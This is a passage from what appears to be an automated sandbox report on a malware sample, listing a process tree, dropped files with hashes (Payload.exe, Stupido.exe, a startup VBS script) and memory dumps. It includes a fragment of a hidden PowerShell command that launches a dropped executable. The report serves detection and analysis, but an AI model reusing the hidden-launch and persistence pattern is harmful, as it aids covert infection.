'"C:\Users\Admin\AppData\Local\Temp\ikiddm.exe"'')); "
                                                                                                                  12⤵
                                                                                                                    PID:1004
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                                    12⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:4952
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                              1⤵
                                                                                                PID:3568
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                1⤵
                                                                                                  PID:3220
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                  1⤵
                                                                                                    PID:4512
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                    1⤵
                                                                                                      PID:3812
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                      1⤵
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:3852
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                      1⤵
                                                                                                        PID:2484
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                                                        1⤵
                                                                                                          PID:1868
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                          1⤵
                                                                                                            PID:3976
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3916,i,7761714625659357865,10802238739796857379,262144 --variations-seed-version --mojo-platform-channel-handle=4556 /prefetch:8
                                                                                                            1⤵
                                                                                                              PID:1260
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4920,i,7761714625659357865,10802238739796857379,262144 --variations-seed-version --mojo-platform-channel-handle=2808 /prefetch:8
                                                                                                              1⤵
                                                                                                                PID:3476
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                                1⤵
                                                                                                                  PID:4452

                                                                                                                Network

                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                Replay Monitor

                                                                                                                Loading Replay Monitor...

                                                                                                                Downloads

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Payload.exe.log

                                                                                                                  Filesize

                                                                                                                  654B

                                                                                                                  MD5

                                                                                                                  2ff39f6c7249774be85fd60a8f9a245e

                                                                                                                  SHA1

                                                                                                                  684ff36b31aedc1e587c8496c02722c6698c1c4e

                                                                                                                  SHA256

                                                                                                                  e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

                                                                                                                  SHA512

                                                                                                                  1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                  Filesize

                                                                                                                  3KB

                                                                                                                  MD5

                                                                                                                  556084f2c6d459c116a69d6fedcc4105

                                                                                                                  SHA1

                                                                                                                  633e89b9a1e77942d822d14de6708430a3944dbc

                                                                                                                  SHA256

                                                                                                                  88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

                                                                                                                  SHA512

                                                                                                                  0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                  Filesize

                                                                                                                  53KB

                                                                                                                  MD5

                                                                                                                  a26df49623eff12a70a93f649776dab7

                                                                                                                  SHA1

                                                                                                                  efb53bd0df3ac34bd119adf8788127ad57e53803

                                                                                                                  SHA256

                                                                                                                  4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                                                                                                                  SHA512

                                                                                                                  e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                  Filesize

                                                                                                                  2KB

                                                                                                                  MD5

                                                                                                                  b8542c31d8908c7a5fa4359a9f753ec3

                                                                                                                  SHA1

                                                                                                                  bb9646b9bf5e7a5b1c3b1adf296edbbd4a5449c9

                                                                                                                  SHA256

                                                                                                                  1973f4ecae310d9bc7c129a2d6e5d0fa77939d2af90e411f9622410608c1c632

                                                                                                                  SHA512

                                                                                                                  dce75e1027dd87771122c11abab626f8a4cedd4c8914b3c49ce4b564dbf48a1da67eea52bc1655ce4f665a20aa1466cd716700641337f04b6118f9c07205d031

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                  Filesize

                                                                                                                  2KB

                                                                                                                  MD5

                                                                                                                  005bc2ef5a9d890fb2297be6a36f01c2

                                                                                                                  SHA1

                                                                                                                  0c52adee1316c54b0bfdc510c0963196e7ebb430

                                                                                                                  SHA256

                                                                                                                  342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

                                                                                                                  SHA512

                                                                                                                  f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                  Filesize

                                                                                                                  944B

                                                                                                                  MD5

                                                                                                                  6d3e9c29fe44e90aae6ed30ccf799ca8

                                                                                                                  SHA1

                                                                                                                  c7974ef72264bbdf13a2793ccf1aed11bc565dce

                                                                                                                  SHA256

                                                                                                                  2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

                                                                                                                  SHA512

                                                                                                                  60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                  Filesize

                                                                                                                  944B

                                                                                                                  MD5

                                                                                                                  e3161f4edbc9b963debe22e29658050b

                                                                                                                  SHA1

                                                                                                                  45dbf88dadafe5dd1cfee1e987c8a219d3208cdb

                                                                                                                  SHA256

                                                                                                                  1359d6daeaed2f254b162914203c891b23139cc236a3bf75c2dfcbe26265c84a

                                                                                                                  SHA512

                                                                                                                  006ffb8f37d1f77f8ee79b22ffa413819f565d62773c632b70985759572121c6ab4743139d16d885f8c0ff9d0e0b136686741728b3e142ee54aea3bb733dffb2

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                  Filesize

                                                                                                                  944B

                                                                                                                  MD5

                                                                                                                  e60eb305a7b2d9907488068b7065abd3

                                                                                                                  SHA1

                                                                                                                  1643dd7f915ac50c75bc01c53d68c5dafb9ce28d

                                                                                                                  SHA256

                                                                                                                  ad07460e061642c0dd4e7dfa7b821aacce873e290389e72f708e9f3504f9d135

                                                                                                                  SHA512

                                                                                                                  95c45afec6fa4e0b2a21edd10a6b2dc30568810c67bc9bc34d98ab111c48261f377a370583adb27e08616b0108026c119493b1b093b52ce931117e646b46cb7b

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                  Filesize

                                                                                                                  1KB

                                                                                                                  MD5

                                                                                                                  d5a6408e58a8e6cdcac441b2724bdeea

                                                                                                                  SHA1

                                                                                                                  c32347262903a5db5422c41c280fe975731155a1

                                                                                                                  SHA256

                                                                                                                  6927aa1bd6f5b470b786b77ac7deac1ac4afcfa7650bc5c72358b3e8462e32d3

                                                                                                                  SHA512

                                                                                                                  f630fa6616ed5aeb1c875f1573de5ca3db917ff6b2d5cb8d3da37ae9e45104a8ebf46b2504d1281b9d3b6705bbf3422c9b40c20b64417ef932c68b314e3aee14

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Payload.exe

                                                                                                                  Filesize

                                                                                                                  59KB

                                                                                                                  MD5

                                                                                                                  07ac8571846ca0cc9f6fcdbe1d000be2

                                                                                                                  SHA1

                                                                                                                  3cbe16f7d24d40b590f97b1999c64c5bb889e8c6

                                                                                                                  SHA256

                                                                                                                  2a3bcea7cadf94c65d4462b2297285078f5232e84267dfa641cb23475ffdb1b5

                                                                                                                  SHA512

                                                                                                                  56413d14e5ee2e615c19232d93047c9d2cc422e083eda0f9f5ae1dc04798989e73d5ad80e06a7dda166deb0177206fb1ed045773bba3975667c12409d67d1e7e

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Powershell.bat

                                                                                                                  Filesize

                                                                                                                  457KB

                                                                                                                  MD5

                                                                                                                  0ffbfd7a95ae6bbe959b1ae1fc7477fd

                                                                                                                  SHA1

                                                                                                                  4aa50ea219154634845682a8f959c7d0e9a4c608

                                                                                                                  SHA256

                                                                                                                  a914dd2a5ea2c98e706a7d2a6c4626b61fde1c078439b4e47fdd10f504dbcb7a

                                                                                                                  SHA512

                                                                                                                  50cc626c219b425b70f77fff1cda8e4478652b4f7a167a52bf2c484a3000a99c7a9f745c79d9fc61a34257294f0c4e135157d073264e0c281de5d1867b0e42af

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Stupido.exe

                                                                                                                  Filesize

                                                                                                                  47KB

                                                                                                                  MD5

                                                                                                                  28ea39d8afd092f7ac283d720c4ff07b

                                                                                                                  SHA1

                                                                                                                  74c3a8c13d8b5722be39a70e6fb91a4084ddab9f

                                                                                                                  SHA256

                                                                                                                  af9d60ae6848565e34f1f4545f75ad894b0cb502f73216487190d95ecb86f282

                                                                                                                  SHA512

                                                                                                                  a2329c29ed655e956beb6ed598134cd2058c46e611d112d1092fd1d603c146ab94215f33ae9f7502379d06c02a58b2ddc82577a18c175eb9bcc6404111a7a372

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uboljilk.klg.ps1

                                                                                                                  Filesize

                                                                                                                  60B

                                                                                                                  MD5

                                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                  SHA1

                                                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                  SHA256

                                                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                  SHA512

                                                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_896.vbs

                                                                                                                  Filesize

                                                                                                                  124B

                                                                                                                  MD5

                                                                                                                  b40cf7dc4a604a18e93dab60d105348e

                                                                                                                  SHA1

                                                                                                                  5014d3c8083412b2ac51754595b2b6228313fda2

                                                                                                                  SHA256

                                                                                                                  c0da9cbe086f9d69a4a881f53c3d0a13e7df8a6ea9776f35e14791c3778925ec

                                                                                                                  SHA512

                                                                                                                  8c7a18f946cb75ea20a44b93681856d842911e1f9a3c79b876dbefeda20fdd09954043295f2e9018c5f283320e83ec6876614b04742a4471f96b980f7b4216b8

                                                                                                                • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

                                                                                                                  Filesize

                                                                                                                  330B

                                                                                                                  MD5

                                                                                                                  fbc387364a7e42faf51ceb60cc5baa41

                                                                                                                  SHA1

                                                                                                                  549463825143c948cebeeb14fc19b0d1775b73d1

                                                                                                                  SHA256

                                                                                                                  e70506593c025b198514981aa69176136b5eb505234f8e41f1905583a7d4d68a

                                                                                                                  SHA512

                                                                                                                  c732eec5b7f7425b5b43bf7abefed4712fb0c1069cfc770910ad5931bcbedf3b5373a7ffd95fa89c7bf00cf49915e679782d88f3556e57c41128a31b31b0be75

                                                                                                                • memory/900-118-0x00007FFE42F70000-0x00007FFE42F80000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/1032-128-0x00007FFE42F70000-0x00007FFE42F80000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/1104-124-0x00007FFE42F70000-0x00007FFE42F80000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/1292-127-0x00007FFE42F70000-0x00007FFE42F80000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/1388-32-0x0000025AD0E00000-0x0000025AD0E44000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  272KB

                                                                                                                • memory/1388-35-0x0000025AD0A50000-0x0000025AD0AB4000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  400KB

                                                                                                                • memory/1388-34-0x0000025AD0A40000-0x0000025AD0A48000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  32KB

                                                                                                                • memory/1388-33-0x0000025AD0ED0000-0x0000025AD0F46000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  472KB

                                                                                                                • memory/1480-134-0x00007FFE42F70000-0x00007FFE42F80000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/1492-125-0x00007FFE42F70000-0x00007FFE42F80000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/1564-119-0x00007FFE42F70000-0x00007FFE42F80000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/1692-131-0x00007FFE42F70000-0x00007FFE42F80000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/1760-121-0x00007FFE42F70000-0x00007FFE42F80000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/1868-133-0x00007FFE42F70000-0x00007FFE42F80000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/2344-130-0x00007FFE42F70000-0x00007FFE42F80000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/2484-123-0x00007FFE42F70000-0x00007FFE42F80000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/2944-14-0x00007FFE64350000-0x00007FFE64E11000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  10.8MB

                                                                                                                • memory/2944-20-0x00007FFE64350000-0x00007FFE64E11000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  10.8MB

                                                                                                                • memory/2944-2-0x00007FFE64353000-0x00007FFE64355000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/2944-8-0x000001C13A810000-0x000001C13A832000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  136KB

                                                                                                                • memory/2944-13-0x00007FFE64350000-0x00007FFE64E11000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  10.8MB

                                                                                                                • memory/3344-129-0x00007FFE42F70000-0x00007FFE42F80000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/3432-117-0x00007FFE42F70000-0x00007FFE42F80000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/3432-69-0x0000000002720000-0x000000000274A000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  168KB

                                                                                                                • memory/3812-126-0x00007FFE42F70000-0x00007FFE42F80000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/4020-248-0x0000000002740000-0x000000000274A000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  40KB

                                                                                                                • memory/4020-183-0x0000000000570000-0x0000000000586000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  88KB

                                                                                                                • memory/4020-238-0x000000001BFC0000-0x000000001BFCE000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  56KB

                                                                                                                • memory/4512-122-0x00007FFE42F70000-0x00007FFE42F80000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/4604-187-0x0000000000740000-0x0000000000752000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  72KB

                                                                                                                • memory/4656-120-0x000001C6B0500000-0x000001C6B0512000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  72KB

                                                                                                                • memory/4656-262-0x000001C6B1150000-0x000001C6B115E000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  56KB

                                                                                                                • memory/4656-263-0x000001C6B1170000-0x000001C6B1186000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  88KB

                                                                                                                • memory/4656-243-0x000001C6B0510000-0x000001C6B051E000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  56KB

                                                                                                                • memory/4656-236-0x000001C6B0F00000-0x000001C6B0F1E000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  120KB

                                                                                                                • memory/4656-279-0x000001C6B1180000-0x000001C6B118C000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  48KB

                                                                                                                • memory/4656-64-0x000001C6B04A0000-0x000001C6B0504000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  400KB

                                                                                                                • memory/4656-235-0x000001C6B0ED0000-0x000001C6B0EDE000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  56KB